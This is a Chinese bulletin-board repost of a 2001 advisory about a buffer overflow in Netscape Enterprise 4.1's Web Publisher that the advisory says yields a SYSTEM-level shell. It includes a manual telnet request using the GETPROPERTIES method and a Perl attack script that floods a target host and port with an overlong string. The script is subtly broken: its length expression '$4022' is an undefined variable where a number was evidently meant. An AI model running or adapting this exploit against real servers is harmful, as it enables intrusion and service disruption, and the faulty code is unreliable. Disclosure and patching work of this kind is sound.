发信人: swak()
整理人: williamlong(2001-07-16 15:09:44), 站内信件
|
Netscape Enterprise Web Publisher 缓冲溢出
整理:swak
发布日期:11/5/2001
漏洞级别:高(可恶意执行SYSTEM级代码)
受影响系统:Netscape Enterprise 4.1 与早期版本
描述:
NETSCAPE的WEB PUBLISHER功能可被缓冲溢出攻击。通过发送一个包含有可执行代
码的缓冲段及新的重定向指针,攻击者便可获得被攻击主机的SHELL。
缓冲溢出存在于PUBLISHER对URI(统一资源签别)上。通过指定GETPROPERTIES,
GETATTRIBUTENAMES等一些NETSCAPE PUBLISHER特有的方法,便可将代码写入含有
此漏洞的主机。
例子:
C:\>telnet www.example.com 80
Connecting To www.example.com... connected.
GETPROPERTIES /(buffer) HTTP/1.1
Host: Hostname
(enter)
(enter)
此处输入约2000个字符。
攻击代码:仅用于测试,后果自负。
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 2) {
print "Usage: host port\n";
exit;
}
#超长字符溢出
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET->new(Proto=>"TCP",
PeerAddr=>$ARGV[0],
PeerPort=>"$ARGV[1]",)
or die "Cant connect to $ARGV[0]: $!\n";
$sock->autoflush(1);
print $sock "$overflow /index.html HTTP/1.0\n\n";
$response=<$sock>;
print "$response";
while(<$sock>){
print "$_\n";
}
close $sock;
}
漏洞补丁:
http://iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
漏洞发布者:
Riley Hassell ([email protected])
|
|